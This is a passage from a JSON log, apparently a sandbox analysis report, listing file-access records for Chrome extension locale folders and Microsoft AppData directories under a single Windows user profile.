"type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Credentials", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\credentials", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Event Viewer", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\event viewer", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Feeds", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\feeds", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\feeds\\microsoft feeds~", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Feeds Cache", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\feeds cache", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\feeds cache\\d68g7bij", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\FORMS", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\forms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\IME12", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\ime12", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\IMJP12", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\imjp12", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\IMJP8_1", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\imjp8_1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\IMJP9_0", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\imjp9_0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Internet Explorer", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\internet explorer", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\internet explorer\\recovery", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\internet explorer\\recovery\\active", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Media Player", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\media player", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\media player\\sync playlists", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E2DF", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e2df", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Office", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\office", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Office\\12.0", "hashes": 